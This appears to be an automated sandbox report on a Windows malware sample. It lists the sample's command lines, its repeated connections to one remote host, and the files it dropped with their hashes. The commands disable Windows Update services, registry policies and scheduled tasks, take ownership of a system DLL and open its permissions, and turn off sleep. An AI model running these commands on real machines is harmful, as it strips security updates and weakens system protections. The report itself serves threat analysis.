C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp

Files

C:\Users\Admin\AppData\Local\Temp\explorer.exe

MD5 19eab19c0d0a0b062c8eb85a94a79cc6
SHA1 3f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA256 02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512 550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 fa0429acc4b9cfd414d24fae0e299790
SHA1 80d76038b5401080e18e6b015cbf806d9abe8589
SHA256 1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
SHA512 f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

MD5 51ab765a1b1f884f936db4ffc642d728
SHA1 7b7741bf5dfeaed3860bf308733490017688fa46
SHA256 816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512 e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

memory/1500-13-0x0000000000C70000-0x0000000000C8E000-memory.dmp

memory/1180-15-0x00000000031F0000-0x0000000003226000-memory.dmp

memory/1500-18-0x0000000002FB0000-0x0000000002FC2000-memory.dmp

memory/2284-17-0x0000000005A00000-0x0000000006028000-memory.dmp

memory/1500-19-0x0000000005560000-0x000000000559C000-memory.dmp

memory/1500-16-0x0000000005B80000-0x0000000006198000-memory.dmp

memory/1180-26-0x00000000057F0000-0x0000000005812000-memory.dmp

memory/2284-28-0x00000000061A0000-0x0000000006206000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ju1w1gkv.agb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1500-43-0x00000000055A0000-0x00000000055EC000-memory.dmp

memory/1180-27-0x0000000005EC0000-0x0000000005F26000-memory.dmp

memory/1180-44-0x0000000006190000-0x00000000064E4000-memory.dmp

memory/2284-50-0x00000000068A0000-0x00000000068BE000-memory.dmp

memory/1500-51-0x0000000005800000-0x000000000590A000-memory.dmp

C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

MD5 76764afd7b394cd6a9c36fa16d4c88fc
SHA1 5274a18139edf134230252c97652bfa6319b1a78
SHA256 e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA512 3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

memory/2284-53-0x0000000007860000-0x0000000007892000-memory.dmp

memory/2284-54-0x000000006F7E0000-0x000000006F82C000-memory.dmp

memory/1180-64-0x0000000007F90000-0x000000000860A000-memory.dmp

memory/2284-65-0x0000000007AA0000-0x0000000007ABE000-memory.dmp

memory/1180-66-0x0000000006CD0000-0x0000000006CEA000-memory.dmp

memory/2284-67-0x0000000007AC0000-0x0000000007B63000-memory.dmp

memory/2284-68-0x0000000007C60000-0x0000000007C6A000-memory.dmp

memory/1180-69-0x0000000008BC0000-0x0000000009164000-memory.dmp

memory/1180-70-0x0000000007B90000-0x0000000007C22000-memory.dmp

memory/2284-71-0x0000000007E80000-0x0000000007F16000-memory.dmp

memory/2284-72-0x0000000007DF0000-0x0000000007E01000-memory.dmp

memory/2284-73-0x0000000007E30000-0x0000000007E3E000-memory.dmp

memory/2284-74-0x0000000007E40000-0x0000000007E54000-memory.dmp

C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

MD5 61b88edb5f6dca914ee05650653d8223
SHA1 4b61f3f21e8c981aaa73e375d090de82be46720d
SHA256 eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA512 1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

memory/2284-76-0x0000000007F20000-0x0000000007F3A000-memory.dmp

memory/2284-77-0x0000000007E70000-0x0000000007E78000-memory.dmp

C:\driverPerf\cominto.exe

MD5 4344aa160852993fab07ae5793321886
SHA1 d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256 bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512 557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

memory/4440-81-0x0000000000440000-0x00000000006CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/4440-94-0x00000000026D0000-0x00000000026DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97f33fe495ac57606ffdb118bcec9bec
SHA1 6a1720500c0b5e2b24bcbc4892275832cc6dd6c7
SHA256 e059c08bce508b0291a1874d2b76acab0135d8d91c3610a2e511cf0ecf66fc82
SHA512 8fd29e536ad0a01af1c7ea3831c695a5c042b576c0d6b127d971a26f5c8ab543dd58b3f13d4695b9eaf435cea2368870d438596267c7b5c6f4e0647da3a6abd9

memory/4340-96-0x000001B693D10000-0x000001B693F31000-memory.dmp

memory/1620-97-0x000000006F7E0000-0x000000006F82C000-memory.dmp

memory/4340-107-0x000001B6AE780000-0x000001B6AE9A2000-memory.dmp

memory/1620-110-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

memory/1620-111-0x0000000007BF0000-0x0000000007C04000-memory.dmp

memory/2440-117-0x000002392B9B0000-0x000002392B9D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b80cd7a712469a4c45fec564313d9eb
SHA1 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512 ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

memory/4308-136-0x000001E167580000-0x000001E167592000-memory.dmp

memory/4808-138-0x0000000140000000-0x0000000140057000-memory.dmp

memory/4808-139-0x0000000140000000-0x0000000140057000-memory.dmp

memory/4308-137-0x000001E1001E0000-0x000001E1001E6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Windows\system32\drivers\etc\hosts

MD5 90da204b95e863dc622c45cf157c5bf6
SHA1 ce345b6a1834178a4db5ed785757d5c685aafc69
SHA256 94b5cd9d7d639e6d610b1404282d6a81a2e13867bf2f1379d449d490deaaf61f
SHA512 ce2735f4b888672761358c050256cc6239e25e225bd2443f0bdd59975f1a38267cf791419d567d194c2d767afb7edb9c28cc86e4a00371303b6f7377827bc949

memory/836-155-0x0000000140000000-0x0000000140057000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 35193486f5924d10afef3959000292db
SHA1 b785c32a128a083fcb3712c72c2b024cf6095685
SHA256 7484fb0afbfc74bbe6a82f1e000fa6d87a68e986b5bd8e6d4115d1b07e72fd5f
SHA512 86e05a7dde1a5e240adef82ce7acad86fd98793010b948c178c3b96ed376b992ca8c8f370b40f1c24a0241ef0c46a5e295aeb7481e1d4ae15fafca18703bfb7b

C:\Windows\Tasks\dialersvc64.job

MD5 8d2fa2b0a4f3a405d67216b3b609a62b
SHA1 bbb6015d7d2949ff690fab69cab83c8d6ca322c3
SHA256 a0889c0ac62ea5329298fb358bd40389824919dd588705fdba3f9d25296aa3b0
SHA512 c689f2582b7d3fd3a95990461f1cb6b705359ab40709a54f6e1be338bf9ec832292df5701cfc4a9b951a17ba7ce8d62d4fb97baf342b8d603b10431d7c77d3a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fa4d34c8a16bbc037c59c0ff7114512
SHA1 bd2fc804aa542f7c2305cfc15b49c1a0c9976aa4
SHA256 ce5fa03584561a909f9748ee7b5a065bd2b2ac6c21456a301120138ce9e2ff84
SHA512 7453c95529b1e2f18fc5c88a3ce1181fe69a7fac12408203e1420741a631b31626e55249f5b7dde35e3c0b6cc00a380d251cc6b4a95285e6b77d8c4f45ee7f44

memory/3084-170-0x00000000049F0000-0x0000000004D44000-memory.dmp

memory/2500-189-0x0000024441930000-0x000002444196C000-memory.dmp

memory/2500-190-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

memory/2500-191-0x00007FFA55350000-0x00007FFA5540E000-memory.dmp

memory/4668-196-0x00007FFA55350000-0x00007FFA5540E000-memory.dmp

memory/4668-193-0x0000000140000000-0x0000000140040000-memory.dmp

memory/4668-194-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

memory/4668-192-0x0000000140000000-0x0000000140040000-memory.dmp

memory/4668-198-0x0000000140000000-0x0000000140040000-memory.dmp

memory/680-202-0x000001E13CBA0000-0x000001E13CBCA000-memory.dmp

memory/316-211-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/316-210-0x000002056CE10000-0x000002056CE3A000-memory.dmp

memory/428-217-0x0000020D00D70000-0x0000020D00D9A000-memory.dmp

memory/1148-236-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1312-246-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1312-245-0x000002CF66BA0000-0x000002CF66BCA000-memory.dmp

memory/1300-242-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1300-241-0x000002B41DA90000-0x000002B41DABA000-memory.dmp

memory/1168-239-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1168-238-0x0000022465780000-0x00000224657AA000-memory.dmp

memory/1148-235-0x000001B15EEE0000-0x000001B15EF0A000-memory.dmp

memory/1128-233-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1128-232-0x0000019BC2D70000-0x0000019BC2D9A000-memory.dmp

memory/1120-230-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1120-229-0x0000027928760000-0x000002792878A000-memory.dmp

memory/1032-227-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/1032-226-0x000002630CB80000-0x000002630CBAA000-memory.dmp

memory/428-218-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/964-214-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/964-213-0x0000019207840000-0x000001920786A000-memory.dmp

memory/616-208-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/616-207-0x000001AC7D5E0000-0x000001AC7D60A000-memory.dmp

memory/680-203-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

memory/616-200-0x000001AC7D5B0000-0x000001AC7D5D3000-memory.dmp

C:\Users\Admin\Chrome\updater.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 8ee0f3b0e00f89f7523395bb72e9118b
SHA1 bec3fa36a1fb136551dc8157a4963ba5d2f957d4
SHA256 8c5f958972fce1812970a1f8da8ccef94a86663d42d13e296813673638a6b68b
SHA512 55f862beb42fa76ca118b2c76c92cb1e0a2586727c602645d0d4bd0e8f2120cfc2015f4333df67f3bd9f4eda8b9b399774461ab558f08312920a1489acf7a207

memory/3556-1045-0x000001DB5E5D0000-0x000001DB5E5D6000-memory.dmp